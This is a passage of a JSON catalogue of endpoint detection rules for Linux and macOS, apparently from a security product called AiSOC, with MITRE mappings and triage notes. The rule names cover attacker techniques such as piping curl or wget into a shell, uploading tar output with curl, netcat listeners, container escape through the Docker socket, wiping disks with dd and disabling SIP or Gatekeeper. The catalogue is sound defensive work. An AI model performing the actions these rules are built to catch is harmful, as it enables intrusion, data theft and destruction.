"detections/endpoint/linux-passwd-modified.yaml" }, { "id": "det-endpoint-158", "type": "detection", "name": "SUID Bit Set On Newly Created Binary", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'SUID Bit Set On Newly Created Binary'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1548.001" ], "log_source": "linux", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-suid-binary-create.yaml" }, { "id": "det-endpoint-159", "type": "detection", "name": "SGID Bit Set On Newly Created Binary", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'SGID Bit Set On Newly Created Binary'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1548.001" ], "log_source": "linux", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-guid-binary-create.yaml" }, { "id": "det-endpoint-160", "type": "detection", "name": "setuid Capability Granted To New Binary", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'setuid Capability Granted To New Binary'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1548.001" ], "log_source": "linux", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-cap-setuid-binary.yaml" }, { "id": "det-endpoint-161", "type": "detection", "name": "/etc/passwd Read By Many Processes In Short Window", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by '/etc/passwd Read By Many Processes In Short Window'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1087.001" ], "log_source": "linux", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-mass-userlist-read.yaml" }, { "id": "det-endpoint-162", "type": "detection", "name": "netcat Listening Mode Detected", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'netcat Listening Mode Detected'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1059.004" ], "log_source": "linux", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-netcat-listen.yaml" }, { "id": "det-endpoint-163", "type": "detection", "name": "curl/wget Piped Directly To Shell", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'curl/wget Piped Directly To Shell'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1059.004" ], "log_source": "linux", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-curl-piped-bash.yaml" }, { "id": "det-endpoint-164", "type": "detection", "name": "Docker Socket Accessed By Non-Root User", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Docker Socket Accessed By Non-Root User'. 
Access to the daemon socket is root-equivalent on the host, so membership in the docker group should be treated as a privileged grant and reviewed rather than auto-excluded. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1611" ], "log_source": "linux", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-docker-socket-read-non-root.yaml" }, { "id": "det-endpoint-165", "type": "detection", "name": "Docker Socket Mounted Into Container", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Docker Socket Mounted Into Container'. A container holding the daemon socket can start privileged containers and escape to the host; CI/CD runners that build images are typically the legitimate source and should be allow-listed by image and node, not globally. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1611" ], "log_source": "linux", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-docker-socket-mounted-into-container.yaml" }, { "id": "det-endpoint-166", "type": "detection", "name": "Container Started With --pid=host", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Container Started With --pid=host'. Sharing the host PID namespace exposes every host process to the container, including their /proc entries and memory via ptrace; node-level monitoring agents are the expected legitimate users. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1611" ], "log_source": "linux", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-host-pid-namespace.yaml" }, { "id": "det-endpoint-167", "type": "detection", "name": "Container Started With --network=host", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Container Started With --network=host'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1611" ], "log_source": "linux", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-host-network-namespace.yaml" }, { "id": "det-endpoint-168", "type": "detection", "name": "Container Granted CAP_SYS_ADMIN", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Container Granted CAP_SYS_ADMIN'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1611" ], "log_source": "linux", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-cap-sys-admin-add.yaml" }, { "id": "det-endpoint-169", "type": "detection", "name": "/proc Re-Mounted With Read-Write", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by '/proc Re-Mounted With Read-Write'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1611" ], "log_source": "linux", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-mount-procfs-rw.yaml" }, { "id": "det-endpoint-170", "type": "detection", "name": "Kernel Module Loaded With insmod", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Kernel Module Loaded With insmod'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1547.006" ], "log_source": "linux", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-kernel-module-load-insmod.yaml" }, { "id": "det-endpoint-171", "type": "detection", "name": "eBPF Program Loaded By Non-Root", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'eBPF Program Loaded By Non-Root'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1547" ], "log_source": "linux", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-ebpf-prog-load-non-root.yaml" }, { "id": "det-endpoint-172", "type": "detection", "name": "ptrace Attached To PID 1", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'ptrace Attached To PID 1'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1611" ], "log_source": "linux", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-ptrace-pid1.yaml" }, { "id": "det-endpoint-173", "type": "detection", "name": "memfd_create Then Executed Anonymous Memory Region", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'memfd_create Then Executed Anonymous Memory Region'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1620" ], "log_source": "linux", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-memfd-create-then-execve.yaml" }, { "id": "det-endpoint-174", "type": "detection", "name": "tar Output Piped To curl Upload", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'tar Output Piped To curl Upload'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1041" ], "log_source": "linux", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-tar-pipe-curl.yaml" }, { "id": "det-endpoint-175", "type": "detection", "name": "rclone Binary Run On Non-Backup Host", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'rclone Binary Run On Non-Backup Host'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1041" ], "log_source": "linux", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-rclone-process.yaml" }, { "id": "det-endpoint-176", "type": "detection", "name": "Large Archive Created In /tmp", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Large Archive Created In /tmp'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1074.001" ], "log_source": "linux", "playbook": "tpl-collection", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-large-stage-tmp.yaml" }, { "id": "det-endpoint-177", "type": "detection", "name": "base64 Decoded Then Executed In Shell", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'base64 Decoded Then Executed In Shell'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1027" ], "log_source": "linux", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-base64-decode-then-execve.yaml" }, { "id": "det-endpoint-178", "type": "detection", "name": "Likely Cryptominer Process Detected", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Likely Cryptominer Process Detected'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1496" ], "log_source": "linux", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-cryptominer-process.yaml" }, { "id": "det-endpoint-179", "type": "detection", "name": "shred Used Against Production Data Path", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'shred Used Against Production Data Path'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1485" ], "log_source": "linux", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-shred-on-prod-data.yaml" }, { "id": "det-endpoint-180", "type": "detection", "name": "dd Writing /dev/zero To Block Device", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'dd Writing /dev/zero To Block Device'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1561.002" ], "log_source": "linux", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-wipe-disk-dd.yaml" }, { "id": "det-endpoint-181", "type": "detection", "name": "Multiple Critical Services Stopped In Quick Burst", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Multiple Critical Services Stopped In Quick Burst'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1489" ], "log_source": "linux", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-systemctl-mass-stop.yaml" }, { "id": "det-endpoint-182", "type": "detection", "name": "Mass File Rename To Ransom Marker Extension", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Mass File Rename To Ransom Marker Extension'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1486" ], "log_source": "linux", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-mass-rename-suspicious-ext.yaml" }, { "id": "det-endpoint-183", "type": "detection", "name": "Process Executed From /proc/self/fd Anonymous Inode", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Process Executed From /proc/self/fd Anonymous Inode'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1620" ], "log_source": "linux", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-fileless-via-procfd.yaml" }, { "id": "det-endpoint-184", "type": "detection", "name": "wget Pulling From Newly Registered TLD", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'wget Pulling From Newly Registered TLD'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1105" ], "log_source": "linux", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-wget-suspicious-tld.yaml" }, { "id": "det-endpoint-185", "type": "detection", "name": "chmod +x Applied To File In /tmp", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'chmod +x Applied To File In /tmp'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1222.002" ], "log_source": "linux", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-chmod-plus-x-tmp.yaml" }, { "id": "det-endpoint-186", "type": "detection", "name": "execve From /dev/shm", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'execve From /dev/shm'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1059.004" ], "log_source": "linux", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-execve-from-dev-shm.yaml" }, { "id": "det-endpoint-187", "type": "detection", "name": "systemd-portable Image Attached", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'systemd-portable Image Attached'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1543.002" ], "log_source": "linux", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-systemd-portable-attach.yaml" }, { "id": "det-endpoint-188", "type": "detection", "name": "modprobe Loaded Module From /tmp", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'modprobe Loaded Module From /tmp'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1547.006" ], "log_source": "linux", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-modprobe-suspicious.yaml" }, { "id": "det-endpoint-189", "type": "detection", "name": "LD_PRELOAD Pointing To /tmp", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'LD_PRELOAD Pointing To /tmp'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1574.006" ], "log_source": "linux", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-ld-preload-set-tmp.yaml" }, { "id": "det-endpoint-190", "type": "detection", "name": "yum/dnf Added Repo From Untrusted Domain", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'yum/dnf Added Repo From Untrusted Domain'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1195.002" ], "log_source": "linux", "playbook": "tpl-supply-chain", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-yum-add-untrusted-repo.yaml" }, { "id": "det-endpoint-191", "type": "detection", "name": "LaunchDaemon Plist Written To /Library/LaunchDaemons", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'LaunchDaemon Plist Written To /Library/LaunchDaemons'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1543.001" ], "log_source": "macos", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-launchdaemon-write-system.yaml" }, { "id": "det-endpoint-192", "type": "detection", "name": "User LaunchAgent Plist Created", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'User LaunchAgent Plist Created'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1543.004" ], "log_source": "macos", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-launchagent-write-user.yaml" }, { "id": "det-endpoint-193", "type": "detection", "name": "Login Item Added Via osascript", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Login Item Added Via osascript'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1547.015" ], "log_source": "macos", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-loginitem-add.yaml" }, { "id": "det-endpoint-194", "type": "detection", "name": "PlistBuddy Used By Non-System Process", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'PlistBuddy Used By Non-System Process'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1547" ], "log_source": "macos", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-plistbuddy-from-non-system.yaml" }, { "id": "det-endpoint-195", "type": "detection", "name": "Apple emond Rule Installed", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Apple emond Rule Installed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1546.014" ], "log_source": "macos", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-emond-installed.yaml" }, { "id": "det-endpoint-196", "type": "detection", "name": "/private/etc/periodic Script Modified", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by '/private/etc/periodic Script Modified'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1037" ], "log_source": "macos", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-periodic-script-modified.yaml" }, { "id": "det-endpoint-197", "type": "detection", "name": "User crontab Created (Rare On macOS)", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'User crontab Created (Rare On macOS)'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1053.003" ], "log_source": "macos", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-cron-tab-create.yaml" }, { "id": "det-endpoint-198", "type": "detection", "name": "~/.ssh/authorized_keys Modified", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by '~/.ssh/authorized_keys Modified'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1098.004" ], "log_source": "macos", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-ssh-authorized-keys-append.yaml" }, { "id": "det-endpoint-199", "type": "detection", "name": "MDM Enrollment Profile Removed", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'MDM Enrollment Profile Removed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.001" ], "log_source": "macos", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-mdm-enrollment-removed.yaml" }, { "id": "det-endpoint-200", "type": "detection", "name": "Configuration Profile Installed", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Configuration Profile Installed'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1078.003" ], "log_source": "macos", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-config-profile-installed.yaml" }, { "id": "det-endpoint-201", "type": "detection", "name": "com.apple.loginitems Modified", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'com.apple.loginitems Modified'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1547.015" ], "log_source": "macos", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-com-apple-loginitems-modified.yaml" }, { "id": "det-endpoint-202", "type": "detection", "name": "Custom .app Bundle Written To /Users/Shared", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Custom .app Bundle Written To /Users/Shared'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1574.002" ], "log_source": "macos", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-app-bundle-shared.yaml" }, { "id": "det-endpoint-203", "type": "detection", "name": "spctl --master-disable (Gatekeeper Off)", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'spctl --master-disable (Gatekeeper Off)'. 
Newer macOS releases renamed this flag to --global-disable, so the rule should match both spellings to avoid silently going blind on upgraded hosts. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1553.001" ], "log_source": "macos", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-spctl-master-disable.yaml" }, { "id": "det-endpoint-204", "type": "detection", "name": "csrutil disable (SIP Off)", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'csrutil disable (SIP Off)'. On current macOS this command only takes effect when run from Recovery, so an on-host invocation is evidence of intent rather than proof that SIP is off; confirm the actual state with csrutil status during triage. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1553" ], "log_source": "macos", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-csrutil-disable.yaml" }, { "id": "det-endpoint-205", "type": "detection", "name": "nvram boot-args Modified", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'nvram boot-args Modified'. The boot-args variable is SIP-protected, so a successful write generally means SIP is already disabled; correlate with the csrutil rule and treat the host as compromised below the OS. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1542.001" ], "log_source": "macos", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-nvram-boot-args.yaml" }, { "id": "det-endpoint-206", "type": "detection", "name": "com.apple.quarantine xattr Stripped", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'com.apple.quarantine xattr Stripped'. 
Stripping the attribute skips Gatekeeper's first-launch check on a downloaded file; developers and packaging tools remove it routinely, so scope the rule on the stripping process and its parent rather than on the attribute removal alone. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1553.001" ], "log_source": "macos", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-quarantine-attribute-removed.yaml" }, { "id": "det-endpoint-207", "type": "detection", "name": "TCC Database Modified Outside tccd", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'TCC Database Modified Outside tccd'. A direct write to TCC.db grants privacy permissions without a user consent prompt and normally requires Full Disk Access or SIP to be off, so the identity and entitlements of the writing process are the key triage fields. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.001" ], "log_source": "macos", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-tcc-db-direct-write.yaml" }, { "id": "det-endpoint-208", "type": "detection", "name": "kextload Of Unsigned Kernel Extension", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'kextload Of Unsigned Kernel Extension'. Current macOS refuses unsigned kexts unless boot security has been lowered, so a successful load implies an already weakened boot policy; a failed attempt is still worth triage as an indicator of intent. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1547.006" ], "log_source": "macos", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-kextload-unsigned.yaml" }, { "id": "det-endpoint-209", "type": "detection", "name": "XProtect Updates Disabled", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'XProtect Updates Disabled'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.001" ], "log_source": "macos", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-xprotect-disabled.yaml" }, { "id": "det-endpoint-210", "type": "detection", "name": "Application Firewall Disabled", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Application Firewall Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1562.004" ], "log_source": "macos", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-firewall-disabled.yaml" }, { "id": "det-endpoint-211", "type": "detection", "name": "App Store Receipt File Tampered", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'App Store Receipt File Tampered'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1562" ], "log_source": "macos", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-mas-receipt-tamper.yaml" }, { "id": "det-endpoint-212", "type": "detection", "name": "codesign --force --deep Used By User", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'codesign --force --deep Used By User'. 
